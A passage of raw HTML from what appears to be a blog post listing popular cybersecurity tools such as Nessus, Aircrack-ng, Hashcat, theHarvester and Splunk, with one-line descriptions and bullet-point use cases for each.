[&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Tests the security of web applications for common vulnerabilities like SQL injection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Comprehensive and easy to use for both beginners and pros.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Nessus</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Scans systems and networks to find and fix vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: A favorite for security professionals due to its detailed reporting.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Aircrack-ng</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Analyzes and cracks Wi-Fi security protocols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Effective for testing the strength of wireless networks.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. <b><strong class=\"font-bold\">John the Ripper</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Tests password strength by performing brute-force attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Lightweight, fast, and supports many encryption formats.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. <b><strong class=\"font-bold\">Hashcat</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Accelerates hash-cracking using GPUs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Versatile and consistently ranks as one of the fastest password recovery tools.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. <b><strong class=\"font-bold\">TheHarvester</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Gathers valuable information about an organization, such as emails and vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Essential for open-source intelligence in penetration testing.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">11. <b><strong class=\"font-bold\">OWASP ZAP (Zed Attack Proxy)</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Automatically scans web apps for vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Open-source and beginner-friendly.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">12. <b><strong class=\"font-bold\">Splunk</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Collects and analyzes machine data for real-time insights and threat detection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: A powerful tool for security information and event management (SIEM).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">13. <b><strong class=\"font-bold\">Elasticsearch</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: A search and analytics engine ideal for log management and threat hunting.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Built for scalability and speed.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">14. <b><strong class=\"font-bold\">Sysinternals Suite</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Troubleshoots and analyzes Windows systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Offers dozens of tools, such as Process Explorer and Autoruns.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">15. <b><strong class=\"font-bold\">KeePass</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Manages passwords securely.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Free, lightweight, and open-source.</li>\r\n</ul>\r\n&nbsp;\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Their Use Cases</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Nmap (Network Mapper)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A robust open-source utility for network discovery and security auditing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identifies active hosts (IP &amp; MAC addresses).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Detects running services (e.g., HTTP, SSH, FTP).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Performs port scanning to identify open ports.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Determines operating systems on target devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Scans for known vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Wireshark</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The go-to protocol analyzer for network traffic capture and analysis.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Troubleshoots network connectivity problems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Analyzes packet contents to understand app communication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Monitors for malicious activities like malware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Conducts forensic analysis for incident investigations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Metasploit</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A highly effective penetration testing framework with a vast exploit library.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tests vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Develops custom exploits for new vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Delivers payloads like malware or reverse shells.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Manages post-exploitation access.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Kali Linux</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Debian-based Linux OS designed for penetration testing and auditing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Comprehensive security assessments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identifies system vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Conducts digital forensics investigations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Performs wireless network audits.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Burp Suite</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A must-have platform for web application security testing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detects vulnerabilities like SQL injection and XSS.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Intercepts and modifies HTTP requests/responses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Scans web apps for known vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Nessus</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A commercial vulnerability scanner trusted by security teams worldwide.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Performs system and network vulnerability scans.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Assesses compliance with security standards.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Prioritizes threat risks for mitigation.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Aircrack-ng</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A specialized suite for wireless network penetration testing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detects and maps wireless networks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Cracks WEP and WPA/WPA2 passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Monitors wireless traffic for suspicious activities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. <b><strong class=\"font-bold\">John the Ripper</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A fast and flexible password-cracking tool.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Cracks passwords using techniques like dictionary and brute-force attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Recovers forgotten passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Audits password strength.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. <b><strong class=\"font-bold\">Hashcat</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Known for its speed and GPU acceleration, this tool is ideal for password cracking.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Cracks MD5, SHA-1, NTLM, and more.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Recovers lost or forgotten passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Audits the strength of password hashes.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. <b><strong class=\"font-bold\">TheHarvester</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An intelligence-gathering tool tailored for reconnaissance activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Gathers employee emails, subdomains, and organization details.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Supports social engineering and penetration testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Collects email addresses (only for authorized purposes).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">11. <b><strong class=\"font-bold\">OWASP ZAP (Zed Attack Proxy)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An open-source security scanner for web applications.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Performs manual and automated web security testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Intercepts and edits HTTP requests and responses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Conducts both active and passive scans of apps.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">12. <b><strong class=\"font-bold\">Splunk</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A leading platform for SIEM (Security Information and Event Management).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use 